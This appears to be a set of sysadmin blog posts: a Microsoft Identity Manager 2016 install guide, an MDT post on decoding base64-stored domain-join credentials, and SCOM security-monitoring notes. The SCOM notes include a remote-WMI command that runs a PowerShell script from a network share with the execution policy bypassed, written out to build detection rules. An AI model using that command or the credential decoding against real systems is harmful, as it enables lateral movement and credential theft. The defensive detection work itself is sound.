Installing Microsoft Identity Manager 2016–Part 2

We addressed the pre-requisites here. As you can see, there was quite a bit to accomplish before even starting on MIM. Now for the good stuff. There are essentially two components in play for the bulk of the install: the Synchronization service and the portal. It’s worth noting that plenty of mistakes can be made here, so think this one through and plan it out carefully.

To start, I’m going to make a couple of notes:

1) Log on as the MIMInstall account. I mentioned this before, but there do seem to be some ties to the account that performs the install. I recommend a generic install account here that is an admin on the server in question. You can disable it later once you’ve granted all the appropriate rights and whatnot, and simply re-enable it as needed.

2) Once you have the CD/ISO mounted, create a temp folder somewhere for logging information. You may need it. Launch an elevated command prompt and run the following from the Synchronization Service folder on the CD (I’m using c:\temp for my temp folder):

msiexec /i "Synchronization service.msi" /L*v c:\temp\MIM_SyncService_Install.log

That will create a log file in the c:\temp folder, which can be useful if you need to troubleshoot.
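If the install does fail, a quick way to find where it died in that verbose log is to search for the Windows Installer failure marker. A minimal sketch, assuming the log path from the command above:

# Windows Installer verbose logs flag a failed action with "Return value 3"
Select-String -Path C:\temp\MIM_SyncService_Install.log -Pattern "Return value 3" -Context 0,5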

Click Next through the welcome screen, accept the license agreement, and click Next again.

This screen is also pretty straightforward; click Next:

image

Here’s where you have hopefully already made a decision. I’m hosting my SQL Server locally, but if you aren’t, you need to change this.

image

The next screen wants the credentials for your MIM service account. This is also pretty easy.

image

Next are the various groups you created previously (by the way, if you haven’t already done this, add the appropriate people to the Admins group):

image

You probably want to let the installer open the firewall ports. If you aren’t using Windows Firewall, you’ll need to open them manually:

image

At this point, you can click Install. I’ll save you the boring screenshot; the install shouldn’t take too long. Once it’s done, launch the Synchronization Service. If it doesn’t start, you have a problem. Go back and figure it out, because trust me, if this isn’t working right, it makes the portal portion even harder. When it’s working, you should see this screen when you launch it, without errors:

image
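If you’d rather confirm things from PowerShell, you can also check that the service itself is registered and running. A quick sketch; the service name below is the FIM-era name the sync engine has historically used, so verify with Get-Service if yours differs:

# The sync engine typically registers under its FIM-era service name
Get-Service -Name FIMSynchronizationService | Select-Object Name, Status, StartType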

If you haven’t done so already, now is a good time to set up those aliases I mentioned in the first piece. You’re going to install the portal next, which sits on top of the SharePoint site collection you set up previously. You can still work off of the CD you mounted earlier, but you’ll need to navigate to the Service and Portal folder and run the following command:

msiexec /i "Service and Portal.msi" /L*v c:\temp\MIM_Service_Install.log

It’s the same concept: you’re writing a log to c:\temp so you can troubleshoot what’s going on. Like before, you can click Next through the welcome screen and accept the license agreement. At this point, you can decide whether you want to use Privileged Access Management (PAM). I chose no here, as this is a lab. It is, however, highly encouraged, as it enables just-in-time administration.

image

Next, you identify a database server and database name:

image

If you have Exchange running locally or online, configure it here. I don’t at this point, so I’m going to uncheck the top two boxes and set this to localhost:

image

In a production environment, I’d have a CA issue a real certificate, for what that’s worth. Here, I’ll use a self-signed one:

image

Next, you define the MIM service account. Note the warning here about the email address; it’s kind of important.

image

Depending on how you configured it, you may receive a warning about the account being insecure. Go back to the guide, figure that part out, and make sure you did it right. Next, you need the management agent account. The server name here is the server where the Synchronization Service was previously installed. I kept these all on the same machine, but I’m also running this in a lab with one user.

image

Side note: if you get this warning, cancel the install and revisit the issues with the Synchronization Service:

image

If you don’t, you’ll move on to this screen. Enter the name of the server hosting the SharePoint site collection:

image

And then enter the site collection URL you created earlier:

image

Now you’ll be prompted for the password registration portal URL. Note that this does need to include the http prefix; it’s cut off in my screenshot. And for some silly reason, MSFT has an * in front of the URL in their example. Don’t do that. I tried it for fun; it doesn’t work.

image

Now for ports: like before, let the installer open them if you have Windows Firewall on. If not, call your firewall person and have them open them:

image
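If Windows Firewall isn’t in play on this box and your firewall person wants specifics, the MIM Service defaults to TCP 5725 and 5726. Here’s a rough sketch of opening them locally with the built-in cmdlets, in case the installer checkbox isn’t an option; adjust the ports if you changed the defaults:

# Allow inbound MIM Service traffic on the default ports
New-NetFirewallRule -DisplayName "MIM Service (TCP 5725-5726)" -Direction Inbound -Protocol TCP -LocalPort 5725,5726 -Action Allow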

And you thought we were done. Not even close. One more service account, this time your SSPR account, which, I’d add, you’ll enter again shortly. You also need the password registration URL (without the http prefix this time), and you may want to open ports. Note that I’m doing this on port 80 because I don’t have a CA, but if you do, you should issue a web certificate here and use 443.

image

If you use port 80, you’ll get a security warning. Either way, you then need to enter the name of the server hosting the MIM Service. I chose to keep this internal, but you may want it on an extranet. Choose accordingly:

image

And for grins, you get to enter your SSPR account again, this time for the password reset portal:

image

If you’re not secure here (i.e., no https), you’ll get another warning. Ideally, go back and set up https; if not, click Next. That brings you to a screen much like the one above. This time, though, you configure the password reset URL along with the server hosting the MIM Service installed above:

image
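If you do want https in a lab with no CA, one option is a self-signed certificate bound to the portal sites in IIS. This is a sketch only, using my lab host names; the installer can generate its own self-issued certificate for the MIM Service itself, so this is strictly for the web side:

# Lab only: self-signed cert covering the portal host names, dropped in the machine store
New-SelfSignedCertificate -DnsName "mim.ctm.contoso.com","passwordregistration.ctm.contoso.com","passwordreset.ctm.contoso.com" -CertStoreLocation Cert:\LocalMachine\My

You’d then bind 443 on each site to that certificate and adjust the URLs accordingly. In production, use a real CA-issued certificate instead.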

Now you’re done (sort of). Click Install. If you have no errors, you can go on to the next part.

Installing Microsoft Identity Manager 2016–Part 1

I’m moving off the SCOM world a bit, as I’ve been tasked with learning a new product. My cyber mentor told me this is one I’ll find myself redoing multiple times, and unfortunately, he wasn’t kidding. I did some looking around and didn’t find much in terms of good step-by-step guides, so I decided to create my own. For the most part, I’m working off of the documentation found here, but there are some gaps in it, along with a few lessons learned that aren’t clearly documented. Hopefully, someone will find this useful.

First, let’s talk about what it is.

Its main purpose is to synchronize your corporate identities from a master copy. Let’s say, for instance, that your authoritative identity store is an HR database. MIM can be used to take the data entered in the HR database and push it to Active Directory, Exchange, a 3rd party ticketing tool, and, well, just about anything, if you take the time to install the connectors and (if necessary) write the scripts. It’s pretty powerful and automates a lot of manual processes that are often filled with user error. It can also be used to synchronize identities between your on-premises infrastructure and your Azure infrastructure. Likewise, it comes with really cool features, such as the ability to enable self-service password resets via a registration and reset portal. This allows users to quickly reset their own passwords instead of waiting on hold for a help desk representative to do it for them. It’s quicker, and it takes a load off of your call center, since password resets are one of the higher-volume calls. As a security person, I think there are better solutions than passwords in general (Microsoft is going two-factor and password-free, for the record), and I think that’s an attainable goal, but organizations don’t often change that fast, and something like MIM can help them transition.

If you want to read more, this is a good starting point. This is basically the next evolution of ForeFront Identity Manager (FIM), so you’ll see a lot of these terms used interchangeably.

Pre-Requisites

Ok, so I’m done with the sales pitch. Sorry about all of that. I’m guessing that if you’re reading this, you’re already interested. From a pre-requisite standpoint, the product is somewhat complicated. You need Active Directory, which, to be fair, everyone has. The web portals sit on top of a SharePoint infrastructure, and of course there’s a SQL database involved as well. So, lots of setup. We break our documentation into the domain setup, server setup, Exchange, SharePoint, and SQL setup. I’m not going to step through all of these, but I am going to highlight the basic needs. First of note, I don’t have Exchange in my lab presently, so I’m not doing that at all.

  • First step, figure out your URLs. For my demo purposes, I’m using mim.ctm.contoso.com as the main portal. I’m using passwordregistration.ctm.contoso.com and passwordreset.ctm.contoso.com for registering and resetting passwords. I’m going to house all of that on one SharePoint front-end server, which also doubles as my MIM server. You can distribute these roles, which is highly recommended for a non-lab environment, but for the purposes of my lab, SQL, SharePoint, and MIM will all be housed on the same server. Since this is web based, https is highly recommended. I don’t have the certificate infrastructure to do that, so I’m going to stick with http in my lab, but I think the average reader understands that this is not a good answer outside of a lab. You can, however, start with http and change it to https later on, since this is all using IIS and SharePoint. I do highly recommend that you involve your SharePoint admin at this stage of planning so they can carve off the site collection and whatnot. There’s a sketch of the DNS aliases after this list.
  • Second step, figure out your accounts. I would note that the scripts here are, for the most part, good. There is, however, a typo in the account creation scripts: both the MIMInstall account and the MIMMA account have MIMMA as the name. You’ll want to correct that if you’re just going to use our scripts. It’s worth noting that our scripts assume a different URL than what I’m using, so you’ll probably want to drop them into an ISE window and edit them to fit your needs, and you probably won’t want to use the same password for all of these accounts either. It’s also worth noting that this is heavily dependent on Kerberos, and as such you’ll need to set up the SPNs (see the sketch after this list). Your SQL and SharePoint admins may have different means of configuring all of this. If, for instance, you aren’t using a SQL service account to manage SQL, then the SPN information will need to be tied to the SQL server machine name and so on. This one will cost you time troubleshooting if you’re not careful, so pay attention to all of it.
  • Third step, install SQL Server. I’m not a fan of the instructions found here. It’s a simple script, and there’s nothing wrong with that, but it really doesn’t tell you much. You need the database engine, obviously. You need SQL Agent set to auto start. You also need Full-Text Search installed; the MIM install will fail if you don’t do that. Your MIMInstall account will need to be an SA over the instance. Our script assumes that the account you created in step 2 is being used as the SQL Server service account. Don’t forget that if you install using the wizard, as there are Kerberos settings tied to it.
  • Fourth step, install SharePoint. These scripts all work, but you’ll need to modify the URLs to suit your needs.
  • Fifth step, Exchange. I don’t have anything to add here because I didn’t do it. You’re on your own here.
  • Sixth step, MIM server setup. The server setup documentation is relatively straightforward. Your MIMInstall account will need to be a local admin, and, as the guide notes, your service accounts need the log on as a service right. You may need to set this via GPO depending on your environment, and of course the SQL and SharePoint accounts will need that too, but if you’ve been working with your SharePoint admin and SQL DBA, that’s been addressed. The server install piece is straightforward, but the scripts were written for older versions of Windows, so they won’t work on a Server 2016 deployment (there is no Application Server role anymore). I’ve modified it slightly:

Import-Module ServerManager
Install-WindowsFeature Web-WebServer,Net-Framework-Features,rsat-ad-powershell,Web-Mgmt-Tools,Windows-Identity-Foundation,Server-Media-Foundation,Xps-Viewer -IncludeAllSubFeature -Restart -Source d:\sources\SxS

Note also the source location, as not all of these are on a standard server build, especially if you’re deploying in the cloud.
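Since the aliases and SPNs in steps one and two are the pieces most likely to cost you troubleshooting time, here’s a minimal sketch of both using my lab URLs. The account names (MIMService, MIMSPS, SqlServer), the CTM domain prefix, and the server name mimserver are placeholders patterned after the Microsoft scripts, so adjust them to whatever you and your DBA and SharePoint admin actually created:

# DNS aliases for the portals, all pointing at the box hosting SharePoint/MIM (run on or against a DNS server)
Add-DnsServerResourceRecordCName -ZoneName "ctm.contoso.com" -Name "mim" -HostNameAlias "mimserver.ctm.contoso.com"
Add-DnsServerResourceRecordCName -ZoneName "ctm.contoso.com" -Name "passwordregistration" -HostNameAlias "mimserver.ctm.contoso.com"
Add-DnsServerResourceRecordCName -ZoneName "ctm.contoso.com" -Name "passwordreset" -HostNameAlias "mimserver.ctm.contoso.com"

# Kerberos SPNs: the MIM Service, the SharePoint app pool serving the portal, and SQL
# (skip the SQL one if SQL runs as the machine account rather than a service account)
setspn -S FIMService/mim.ctm.contoso.com CTM\MIMService
setspn -S HTTP/mim.ctm.contoso.com CTM\MIMSPS
setspn -S MSSQLSvc/mimserver.ctm.contoso.com:1433 CTM\SqlServer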

Anyways, that’s it for the setup. Next step will cover the sync service as well as the portal installs.

Referencing Username and Password Credentials in an MDT Task Sequence

I don’t usually write about MDT, and I don’t plan on making this a habit either. However, I ran into an issue doing some automation for a customer that I felt needed documentation. This is just as much for my own benefit as it is for the three people who may find it useful, but there wasn’t much written about this online. Whenever I find myself in this situation, I usually turn it into a blog post if the solution is not something that’s naturally intuitive.

First, to back up a bit. Microsoft Deployment Toolkit (MDT) is a free method of creating light- and zero-touch deployments of operating system images across physical and/or virtual platforms. It’s generally installed as a sub-component of SCCM (which is not free). SCCM can provide more automation for these types of tasks and gets you around the problem I’m describing here, but MDT can exist in a standalone environment, especially if System Center is too expensive to purchase. Even at MSFT we have uses for MDT in certain types of engagements, as it can automate some of the solutions we bring into a customer environment without needing to set up a System Center infrastructure.

In this particular case, we needed to make use of some of the variables in the MDT scripting environment. It’s worth noting that there are a ton of variables available. A full list of what’s available to you can be found in the variables.dat file that exists locally on the machine being built. This file is generated during deployment and is then removed once deployment is complete. I’m sure there’s a place on the MDT server that houses this as well, but I never got that far, as the file was not removed while my task sequence was failing. The long and short of it is that you can open this file with Notepad and see all of the variables available to you in a scripting environment.
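For reference, while a deployment is running the file usually sits in MDT’s working directory on the client; treat the exact path below as an assumption, since it can vary by environment:

# Dump the deployment variables captured so far (typical MDT working directory on the machine being built)
Get-Content "C:\MININT\SMSOSD\OSDLOGS\VARIABLES.DAT"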

From a scripting standpoint, these variables can be referenced within the script being executed by your task sequence, allowing you some very powerful automation options. The problem, as we discovered, is that some variables are not represented in clear text. As you can guess, this is typically username and password data. Both of these are in the variables.dat file, but not in readable form, as they are stored in base64 format. To be abundantly clear, nothing about this is secure. It’s meant only to prevent prying eyes from seeing usernames and passwords in clear text. Converting from base64 to ASCII is a single line of PowerShell, so whatever credentials you choose to put in MDT need to have only the permissions required for the task at hand. Physical access to your build environment is also paramount. Keep that in mind as well.

To start, we need to load the TS environment. This is easy to do and not hard to find online:

$tsenv = New-Object -ComObject Microsoft.SMS.TSEnvironment

At this point, we need to reference the variable. In my case, I’m going to use the domain join account that someone specifies during the installation wizard. You do this as such:

$Username = $tsenv.Value("OSDJOINACCOUNT")
$Password = $tsenv.Value("OSDJOINPASSWORD")

$Domain = $tsenv.Value("DOMAINNAME")

Again, that’s pretty easy. The $Domain value is in clear text, so there’s not much to this, but if you were to pull the OSDJOINACCOUNT and OSDJOINPASSWORD variables out of the variables.dat file, you’d see something non-readable. The hard work in my case was figuring out what this format was. My assumption was that it was probably hashed like a typical password. That wasn’t the case, and it took a lot of digging around to find an offhand comment on Reddit that these were actually base64. For a PowerShell professional, this is pretty easy, but for those of us who don’t breathe ISE, it’s a bit more difficult. From there, you need this step:

$Password2 = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($Password))
$Username2 = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($Username))

Now we have the Username and Password in a format that a Task Sequence can use. The rest is pretty standard. I’m converting the password to a secure string and creating a credential object in PowerShell that can use it.

$CredPass = ConvertTo-SecureString $Password2 -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential($Username2,$CredPass)

At this point, you have a credential that works, and whatever PowerShell command you’re trying to script that uses said credential can be given the $Credential variable.
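For example, if the command you’re automating is a remote call, it might look like the line below. The target server name is purely illustrative; the point is just that anything accepting -Credential can take the object we built:

# Illustrative only: pass the rebuilt credential to any cmdlet that accepts -Credential
Invoke-Command -ComputerName fileserver01 -Credential $Credential -ScriptBlock { hostname }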

That’s it.

Don’t ask me how to do it in VBS. I have no plans on learning that. 

Security Monitoring Future Plans (May 2019)

The good news about this project is that we’ve been able to knock out a lot of low-hanging fruit that can be used to detect some of the breadcrumbs an attacker leaves behind, as well as to identify where legacy protocols are being used. The bad news is that most of the low-hanging fruit has been picked clean. This space will be used to identify and track future plans.

I’m going to stick with a one-year cadence. This has been developed mostly by me on my own time, and as such there are only so many hours to go around. My current plans are as follows:

  • I would like to develop a monitoring component targeting administrative accounts. I’m not sure how easily this can be accomplished. Enumerating these against a DC is not that hard to do, but in order to alert on them, these objects would need to be created on each and every DC, which isn’t realistic from a performance standpoint. There’s currently an unhosted class and a disabled discovery in this MP, but nothing is targeted against it. The hope would be to come up with a way to start tracking admin accounts in general, logons outside of business hours, etc.
  • I’m hoping to delve more into WMI monitoring with the next release.
  • There are a few rules that I could see re-writing to add overridable parameters.
  • Likely going to write some detection mechanisms around this SCOM vulnerability.

This is not a big list presently, but as time permits I hope to grow it. Any suggestions are always appreciated.

Security Monitoring Change Log May 2019

  • Updated Task Scheduler Creation Rule
  • Updated Service Creation on DC Rule
  • Disabled alert rule for Batch Logon. There is a report that is capturing this. The rule is still present and can be enabled.
  • Created override for Local Account Creation rules for domain controllers. While this didn’t appear in any testing, I was told that some security software can generate false positives for this one on domain controllers. Since DCs don’t have local accounts to begin with, I simply turned this off for domain controllers.
  • Fixed a bug with the regsvr32 remote DLL registration rule.
  • Added rules/discoveries associated with writeable locations in the OS. Note that there are three parts to this series.
  • Added rule to detect attempts to kill Windows Defender.
  • Added collection rule and report for TLS usage.
  • Added rules for suspicious PowerShell Usage.  For instructions on overrides, please see the addendum.
  • Removed dependency on SQL MP.
  • Added rule for WMI Persistence.
  • Added rules for WMI Remoting.
  • Distributed application
  • Added a timeout as an overridable parameter to the SMB1 collection rule. The specified timeout of 60 seconds was causing failures in my lab. I upped this value to 300 seconds as the default setting.
  • Turned off registry monitor for WDigest settings. This was not needed in Server 2012/2016. With Server 2008 going out of support, I’ve disabled the monitor. It is still present if someone desires to use it. 

Security Monitoring: Using SCOM to Detect Remote WMI Attempts

Last week, I wrote about a WMI persistence attempt, where an attacker can use the WMI scheduler to effectively hide a scheduled task within WMI. Today, I’m going to talk about another use of WMI that was in Matt Graeber’s paper: remoting. This is another thing that I suppose happens from time to time in an environment, but I’m guessing it’s fairly rare given the plethora of remote administration tools out there.

I started by borrowing the PowerShell code needed to accomplish this. As you can see, the code isn’t that difficult to write:

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'powershell.exe -noexit -ExecutionPolicy Bypass -File \\scom1\new_share\badps.ps1' -ComputerName SQL1 -Credential 'nagau\nagau'

I essentially created a share on my SCOM server and used it to execute a PowerShell script remotely on my SQL server using my credentials. A bad guy can do this too, though I’m also going to assume they’d use something a bit more sophisticated and would be passing the hash of a stolen account in some capacity. I’m not too worried about that at the moment; I’m more concerned with seeing what can be reliably detected. The WMI logs were unfortunately useless. However, there were some interesting events in the security logs on both of the servers in question. On my source server, the following event was captured:

image

This is a standard logon/logoff event, and you’ll see it pretty much every time something logs on to your system. On its own, that’s going to be a noisy event, but often with this kind of stuff, the devil is in the details, and I think the highlighted information has some clues that there’s something going on that shouldn’t be. For one, this isn’t a standard RUNAS, as the event ID implies. I tested this on the same system: doing a local RUNAS will have the account name you used listed, but it will also have a target of localhost, and the additional information will also say localhost. The process name is also somewhat telling here, being svchost. While it’s not unusual to see svchost as a process, this event is telling us that svchost is making a remote procedure call. It’s probably worth noting that there was another 4648 on the same machine with a bit more info about what I was doing, but I’m not sure it has anything useful that I could alert off of.

image

We can see from that event that I’m also targeting a remote server and that I’m using PowerShell ISE to run the command, but ultimately an attacker will be using their own tools, and if I knew the name of said process, I could just target that. This particular event might be something worth searching for if the top event appears.

On the remote host, I also saw another telling event, in this case it was our 4688 that we routinely target:

image

If you look closely, you’ll notice that my PowerShell bypassed my execution policy. That alert fired as expected, so I won’t target that here. But the highlighted fields were also pretty unique for a typical 4688. You can see that WMI kicked off a PowerShell process, but under the context of the Network Service account instead of the System account, like one would typically see. The security ID also uses the NULL SID, which seems to differ from other Network Service usages that created 4688 events. As such, I’m going to try out two new rules to see just how unique these events are:

Rule 1 will target the security log, looking for our 4648 with parameter 10 containing RPCSS, parameter 9 not containing the computer name, and parameter 12 containing svchost

Rule 2 will target the security log looking for a 4688 event with parameter 1 containing Network, parameter 10 containing NULL, and parameter 14 containing WmiPrvSe.exe
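If you want to sanity-check which piece of event data lands in which parameter number before building rules like these, you can eyeball a recent event from PowerShell. A rough sketch; the index printed here follows the event’s property order, which is what the parameter numbers are based on:

# Pull one recent 4688 and list its data values with a 1-based index
$evt = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 1
$i = 1
foreach ($p in $evt.Properties) { "{0,2}: {1}" -f $i, $p.Value; $i++ }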

Note: For this to work properly, the process command line GPO MUST be set; otherwise, it will screw up the parameters.
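In a domain, the GPO is the right way to do that, but for a quick lab test you can flip the same settings locally. The registry value below is the one the "Include command line in process creation events" policy writes; treat this as a sketch:

# Make sure process creation auditing is on, then include the command line in 4688 events
auditpol /set /subcategory:"Process Creation" /success:enable
New-Item -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit' -Force | Out-Null
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit' -Name 'ProcessCreationIncludeCmdLine_Enabled' -Value 1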

I’ll let these bake and see if they make noise. Happy SCOMing.

Update 3/19 – SCOM can actually trigger one of these rules. It’s not surprising on investigation, as SCOM will periodically restart the health service when it takes up too much CPU/RAM. Since my DC is chronically under-spec’d, I’m not surprised to find SCOM doing this. Anyway, I’ve updated the rule to exclude SCOM’s remote WMI attempt.